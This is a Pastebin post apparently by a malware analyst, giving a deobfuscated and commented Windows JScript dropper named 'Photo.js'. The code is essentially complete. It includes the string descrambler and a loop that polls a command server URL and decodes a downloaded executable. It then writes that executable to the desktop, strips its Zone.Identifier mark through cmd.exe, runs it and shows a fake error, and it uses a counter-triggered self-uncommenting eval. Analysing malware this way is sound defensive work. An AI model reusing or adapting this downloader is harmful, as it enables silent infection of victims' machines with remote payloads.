API tools faq
paste
Advertisement
MalwareBreakdown

Photo.js deobfuscated and commented

MalwareBreakdown
Jun 5th, 2017
10,803
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
JavaScript 12.11 KB | None | 0 0
raw download clone embed print report
  1. // A pointer to a new object created under the Scripting application
  2. var fsObject = new ActiveXObject('Scripting.FileSystemObject');
  3.  
  4. // Test if the file 'bfffdebdedceea.txt' exists using the FileExists() method.
  5.     // True: the file exists and the caller has the proper permissions.
  6.     // False: path is null, invalid path, or zero-length string. Also if the permissions are incorrect, no error is thrown and result is always false.
  7. if(fsObject.FileExists('bfffdebdedceea.txt')){
  8.     fsObject.DeleteFile(tempFolder + '/' + 'bfffdebdedceea.txt');
  9.     Wscript.echo('cbeaedaefdccdbcf');
  10.    
  11.     Wscript.echo('cbeaedaefdccdbcf');
  12.        
  13.     Wscript.echo('cbeaedaefdccdbcf');
  14. }
  15.  
  16. if(fsObject.FileExists('bfffdebdedceeaas.txt'))fsObject.DeleteFile(tempFolder + '/' + 'bfffdebdedceeaas.txt');
  17.  
  18. // The GetSpecialFolder() method is called to return the index of a specific special folder, in this case, 2 is the temp folder.   
  19. var tempFolder = fsObject.GetSpecialFolder(2);
  20.  
  21.  
  22.     /*  This section of code is ultimately evaluated by this JS program. The contents of this file are read into the program, the comments are removed, and then the contents are called with eval().
  23.  
  24.     var exeString = '';
  25.     var hexBuffer = [];
  26.     var newStr;
  27.  
  28.     function hexConvertToStrings(bedefccdeacfbccafab) {
  29.         var ffbcaececdda = bedefccdeacfbccafab.toString();
  30.         var da = '';
  31.         for (var ebffaedbdafcbf = 0; ebffaedbdafcbf < ffbcaececdda.length; ebffaedbdafcbf += 2)
  32.             da += String.fromCharCode(parseInt(ffbcaececdda.substr(ebffaedbdafcbf, 2), 16));
  33.         return da;
  34.     }
  35.  
  36.     function isANumber(inputNumber) {
  37.         // This logic is checking for two things:
  38.             // inverse of is not-a-number (aka is a number) AND if the number is finite.
  39.         return !isNaN(parseFloat(inputNumber)) && isFinite(inputNumber);
  40.     }
  41.  
  42.     function aaffacfdceaf(fdacdaffdacdaf,ccdacbcdbd){
  43.         for(i=ccdacbcdbd;i>0;i--){
  44.             fdacdaffdacdaf = fdacdaffdacdaf - 1;
  45.            
  46.             if(fdacdaffdacdaf<0)
  47.                 fdacdaffdacdaf = 9;
  48.            
  49.         }
  50.  
  51.         return fdacdaffdacdaf;
  52.     }
  53.  
  54.     function bdfebaadddbdfade(sstrstrtfdacdafr,ebbfbddcdb){
  55.         var counter = sstrstrtfdacdafr.length;     
  56.         var adafefddcbcaed = '';
  57.         var ceedeebde = 0;
  58.        
  59.         for(var bdcfebcc=0;bdcfebcc<counter;bdcfebcc++){
  60.             if(ceedeebde>10)
  61.                 ceedeebde=0;
  62.            
  63.             if(isANumber(sstrstrtfdacdafr.charAt(bdcfebcc))){
  64.                 adafefddcbcaed = adafefddcbcaed + aaffacfdceaf(sstrstrtfdacdafr.charAt(bdcfebcc),ebbfbddcdb[ceedeebde]);
  65.                 ceedeebde++;
  66.             }else{
  67.                 adafefddcbcaed = adafefddcbcaed + sstrstrtfdacdafr.charAt(bdcfebcc);
  68.             }
  69.         }
  70.  
  71.         return adafefddcbcaed;
  72.     }
  73.  
  74.  
  75.     function descrambler(inputString,fecdfaaeadefcb){
  76.         var efbcfbbbccafbfb = "D6duab_xJNfST(zLh$^ke,1Mj&+KsHU2;0WYcrE7%IOGnt*8FRmX!q5:A-oiPy)QBClwp9v4V@3gZ.";
  77.         var adffafadafeedcaaa = "";
  78.         var bcbcddacabdbbad = efbcfbbbccafbfb.length-1;
  79.         var size = inputString.length;
  80.  
  81.         for(var cafbbfbcc = 0; cafbbfbcc<size ; cafbbfbcc++){          
  82.             var deafbfabb = efbcfbbbccafbfb.indexOf(inputString.charAt(cafbbfbcc));
  83.             var bdcaddfedb = deafbfabb - fecdfaaeadefcb;
  84.            
  85.             if(bdcaddfedb<0){
  86.                 bdcaddfedb = bcbcddacabdbbad - Math.abs(bdcaddfedb);
  87.                 var ccdacbcdbd = bcbcddacabdbbad - 1;  
  88.                 if(bdcaddfedb==ccdacbcdbd)
  89.                     bdcaddfedb = bdcaddfedb + fecdfaaeadefcb;
  90.             }
  91.            
  92.             adffafadafeedcaaa = adffafadafeedcaaa + efbcfbbbccafbfb.charAt(bdcaddfedb);
  93.         }
  94.        
  95.         return hexConvertToStrings(adffafadafeedcaaa);
  96.     }
  97.  
  98.     // ActiveXObject('Scripting.FileSystemObject')
  99.     var fsObject = new ActiveXObject(descrambler("%gdg%;dv%W%Vdvd7d%;7dddvdld:%g%v%g%Vd:d6dRd;d-d:dg%V",1));
  100.     var tempFolder = fsObject.GetSpecialFolder(2);
  101.  
  102.     // ActiveXObject('WScript.Shell')
  103.     var wScriptObject = new ActiveXObject(descrambler(':%:gdg%;dv%W%V;7%gdFd:dldl',1));
  104.     // SpecialFolders('Desktop')
  105.     // This returns the shortcuts on the current user's desktop.
  106.     var placeholder = wScriptObject.SpecialFolders(descrambler('VVd:%gdC%VdR%W',1));
  107.     var deskShortcuts = placeholder;
  108.  
  109.     // ActiveXObject('Scripting.FileSystemObject')
  110.     var fsObject = new ActiveXObject(descrambler("%gdg%;dv%W%Vdvd7d%;7dddvdld:%g%v%g%Vd:d6dRd;d-d:dg%V",1));    
  111.  
  112.     // ActiveXObject('MSXML2.XMLHTTP.3.0')
  113.     var XMLHttpObject = new ActiveXObject(descrambler('V6%g%Fd6dlg;;7:FV6VlVF:V:V:W;7gg;7gW',1));
  114.  
  115.     var iter = 0;
  116.     var index = 0;
  117.  
  118.     // linsssee is 'http://sobberinfo[.]com/gate.php'
  119.     var link = ['dF%V%V%Wg-;R;R%gdRd;d;d:%;dvd7dddR;7dgdRd6;Rd%dM%Vd:;7%WdF%W'];
  120.  
  121.     while(true){
  122.         iter++;
  123.         if(link[index] == undefined)
  124.             index = 0;
  125.  
  126.         try {
  127.             // XMLHttpObject.open("GET", "http://sobberinfo[.]com/gate.php?ff"+<number>, async=false)
  128.             XMLHttpObject.open(descrambler('V%V::V',1), descrambler(link[index],1)+'?ff'+iter, false);
  129.             XMLHttpObject.send();
  130.         } catch(e) {
  131.             index++;
  132.             WScript.Sleep(1000);
  133.             continue;
  134.         }
  135.  
  136.         var responseIndexTriplePipe = XMLHttpObject.responseText.indexOf('|||');
  137.  
  138.         if( responseIndexTriplePipe == -1 ){   
  139.             index++;
  140.             WScript.Sleep(1000);
  141.             continue;  
  142.         }      
  143.  
  144.         if(XMLHttpObject.Status == 200)break;
  145.     }
  146.  
  147.     // This returns the DOMString object containing the response as text.
  148.     var responseContent = XMLHttpObject.responseText;
  149.    
  150.     // responseContent = responseContent.split('|||')
  151.     responseContent = responseContent.split(descrambler('%l%l%l',1));
  152.    
  153.     // numberList = responseContent[0].split(,)
  154.     // The numberList is provided in the first part of the response containing the payload; which was separated by three pipe characters.
  155.     var numberList = responseContent[0].split(descrambler(';l',1));
  156.      
  157.     // responseContent[1] is the large hex content of the '36d4.exe' payload.
  158.     exeString = bdfebaadddbdfade(responseContent[1],numberList);
  159.    
  160.     // ActiveXObject('Scripting.FileSystemObject')
  161.     var fsObjectooo = new ActiveXObject(descrambler("%gdg%;dv%W%Vdvd7d%;7dddvdld:%g%v%g%Vd:d6dRd;d-d:dg%V",1));
  162.  
  163.     var  hexBuffer = [];
  164.  
  165.     for(var bdcfebcc=0; bdcfebcc< exeString.length-1; bdcfebcc+=2){
  166.         hexBuffer.push(parseInt(exeString.substr(bdcfebcc, 2), 16));
  167.     }
  168.  
  169.     // This will convert the buffer into a string.
  170.     newStr = String.fromCharCode.apply(String, hexBuffer);
  171.  
  172.     function fbbecbbbeadeadefbba(inputString){
  173.         var stringHolder = inputString;
  174.         // ActiveXObject('ADODB.Stream')
  175.         var edfabefbaadbfc = new ActiveXObject(descrambler('VMVVVRVVV;;7:g%V%;d:dMd6',1));
  176.         // Set the type value to the default of text.
  177.         edfabefbaadbfc.Type = 2;
  178.         // Set the character set to ISO-8859-1.
  179.         edfabefbaadbfc.Charset = 'ISO-8859-1';
  180.         // Opens a stream object.
  181.         edfabefbaadbfc.Open();
  182.         // Writes the input buffer contents to the stream object.
  183.         edfabefbaadbfc.WriteText(stringHolder);
  184.         // Saves the binary contents of the file from the stream object.
  185.         // A shortcut on the desktop for '36d4.exe'
  186.         edfabefbaadbfc.SaveToFile(deskShortcuts + '/' +descrambler('gggddVgV;7d:%Fd:',1), 2);
  187.         // Closes the stream object.
  188.         edfabefbaadbfc.Close();
  189.     }
  190.     fbbecbbbeadeadefbba(newStr);
  191.  
  192.     // ActiveXObject('Scripting.FileSystemObject')
  193.     var fsObject = new ActiveXObject(descrambler("%gdg%;dv%W%Vdvd7d%;7dddvdld:%g%v%g%Vd:d6dRd;d-d:dg%V",1));
  194.      
  195.     var fileFound = fsObject.FileExists(tempFolder + '/' +'fbafcfadbceffc.txt');
  196.        
  197.     // ActiveXObject('WScript.Shell')
  198.     // // A pointer to a new shell object created under the WScript application
  199.     var wShellObject = new ActiveXObject(descrambler(':%:gdg%;dv%W%V;7%gdFd:dldl',1));
  200.  
  201.     // Run('cmd.exe /c echo [ZoneTransfer]>' + ceaebecfbabcd + '\\36d4.exe:Zone.Identifier')   
  202.     wShellObject.Run(descrambler('dgd6dV;7d:%Fd:;W;Rdg;W',1) + descrambler(';;d:dgdFdR;W:C:-dRd7d::V%;dMd7%gddd:%;:6g7;W',1)+ ceaebecfbabcd +'\\'+ descrambler('gggddVgV;7d:%Fd:',1)+descrambler('g-:-dRd7d:;7VvdVd:d7%Vdvdddvd:%;;;',1),0,false);
  203.  
  204.     // Run('cmd.exe /c echo ZoneId=2>>' + deskShortcuts + '\\36d4.exe:Zone.Identifier')
  205.     wShellObject.Run(descrambler('dgd6dV;7d:%Fd:;W;Rdg;W',1) + descrambler(';;d:dgdFdR;W:-dRd7d:VvdVg6g;g7g7;W',1)+ deskShortcuts +'\\'+ descrambler('gggddVgV;7d:%Fd:',1)+descrambler('g-:-dRd7d:;7VvdVd:d7%Vdvdddvd:%;;;',1),0,false);
  206.    
  207.     // Run('cmd.exe /c' + deskShortcuts + '\\36d4.exe')
  208.     wShellObject.Run(descrambler('dgd6dV;7d:%Fd:;W;Rdg;W',1)+ deskShortcuts +'\\'+ descrambler('gggddVgV;7d:%Fd:',1),0,false);
  209.        
  210.     WScript.echo('Runtime Error 0x48940 (.QBT) Library not located on the system, please use x64 system.');
  211.  
  212.     // Deletion of some files.
  213.     fsObject.DeleteFile(tempFolder + '/' +'febdbaabfer.txt');
  214.     if(fileFound)
  215.         fsObject.DeleteFile(tempFolder + '/' +'fbafcfadbceffc.txt');   
  216.        
  217.     WScript.Quit();
  218.        
  219.     */
  220.    
  221. function readFile(input){  
  222.     var fsObject = new ActiveXObject('Scripting.FileSystemObject');
  223.    
  224.     var tempVar = input;
  225.    
  226.     var inputFile = tempVar;
  227.  
  228.     // The OpenTextFile() method call is to open a specific file for reading/appending. The file option specified is read-only.
  229.     // The returned object is a TextStream.
  230.     var fileReadStream = fsObject.OpenTextFile(inputFile, 1);
  231.    
  232.     var fileContents = fileReadStream.ReadAll();
  233.            
  234.     fileReadStream.Close();
  235.    
  236.     return fileContents;   
  237. }
  238.  
  239.    
  240. var counter = 0;
  241. var fileFound = fsObject.FileExists(tempFolder + '/' + 'febdbaabfer.txt');
  242. if(fileFound == true){
  243.     // The OpenTextFile() method call is to open a specific file for reading/appending. The file option specified is read-only and the file format is treated as Unicode.
  244.     // The returned object is a TextStream.
  245.     var fileReadStream = fsObject.OpenTextFile(tempFolder + '/' + 'febdbaabfer.txt', 1,1);
  246.    
  247.     // The contents of the file is a numerical value.
  248.     counter = fileReadStream.ReadAll();
  249.     fileReadStream.Close();
  250. }
  251.  
  252. counter = parseInt(counter) +1;
  253.  
  254. // Check if the file exists, and if it does then deletes the file.
  255. if(fsObject.FileExists('bfffdebdedcee3.txt'))
  256.     fsObject.DeleteFile(tempFolder + '/' + 'bfffdebdedcee3.txt');
  257.  
  258. // The file is opened for writing (indicated by 2) and in Unicode format.  
  259. fileReadStream = fsObject.OpenTextFile(tempFolder + '/' + 'febdbaabfer.txt', 2,1);
  260.  
  261. // The WriteLine() method call writes the string to the file followed by a newline.
  262. fileReadStream.WriteLine(counter);
  263. fileReadStream.Close();
  264.    
  265. var fullPath = WScript.ScriptFullName;
  266. var baccafefbfad = readFile(fullPath);
  267.  
  268. // Check if the file exists, and if it does then deletes the file.
  269. if(fsObject.FileExists('bfffdebdedcee.txt'))
  270.     fsObject.DeleteFile(tempFolder + '/' + 'bfffdebdedcee.txt');
  271.    
  272. if(counter==4){
  273.     // The file is opened for writing (indicated by 2) and in Unicode format.
  274.     fileReadStream = fsObject.OpenTextFile(tempFolder + '/' + 'ebceeadfbaa.txt', 2,1);
  275.  
  276.     // Check if the file exists, and if it does then deletes the file. 
  277.     if(fsObject.FileExists('bfffdebdedceea.txt'))
  278.         fsObject.DeleteFile(tempFolder + '/' + 'bfffdebdedceea.txt');
  279.  
  280.     // Write out the counter to the file.  
  281.     fileReadStream.WriteLine(counter);
  282.     fileReadStream.Close();
  283.    
  284. }
  285.  
  286. if(counter==5){
  287.     // A series of checks for the existence of a file, and then deletes it.
  288.     if(fsObject.FileExists(tempFolder + '/' + 'defbfeccdfc.jpg'))
  289.         fsObject.DeleteFile(tempFolder + '/' + 'defbfeccdfc.jpg');
  290.     // The file is renamed with the MoveFile() method from source (argument 1) to destination (argument 2).
  291.     fsObject.MoveFile(tempFolder + '/' + 'ebceeadfbaa.txt', tempFolder + '/' + 'fbafcfadbceffc.txt');
  292.     if(fsObject.FileExists(tempFolder + '/' + 'fffefccf.txt'))
  293.         fsObject.DeleteFile(tempFolder + '/' + 'fffefccf.txt');
  294.     if(fsObject.FileExists(tempFolder + '/' + 'fffefccf.txt'))
  295.         fsObject.DeleteFile(tempFolder + '/' + 'fffefccf.txt');
  296.     if(fsObject.FileExists(tempFolder + '/' + 'fffefccf.txt'))
  297.         fsObject.DeleteFile(tempFolder + '/' + 'fffefccf.txt');
  298.     if(fsObject.FileExists(tempFolder + '/' + 'fffefccf.txt'))
  299.         fsObject.DeleteFile(tempFolder + '/' + 'fffefccf.txt');
  300.     if(fsObject.FileExists('bfffdebdedceea.txt'))
  301.         fsObject.DeleteFile(tempFolder + '/' + 'bfffdebdedceea.txt');
  302.  
  303.     // A series of chain replacements, the string 'deaccffbaa' is replaced by nothing 5 times.
  304.     // The last series of replacements is "/*" and "*/" being replaced with '' to uncomment the code.
  305.     baccafefbfad = baccafefbfad.replace('/*','').replace('*/', '').replace('deaccffbaa', '').replace('deaccffbaa', '').replace('deaccffbaa', '').replace('deaccffbaa', '').replace('deaccffbaa', '');
  306. }
  307.  
  308.  
  309. var fileFound = fsObject.FileExists(tempFolder + '/' + 'fbafcfadbceffc.txt');
  310.  
  311. if(fileFound == true){  
  312.    eval(baccafefbfad);
  313. }
  314.  
  315. eval(baccafefbfad);
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!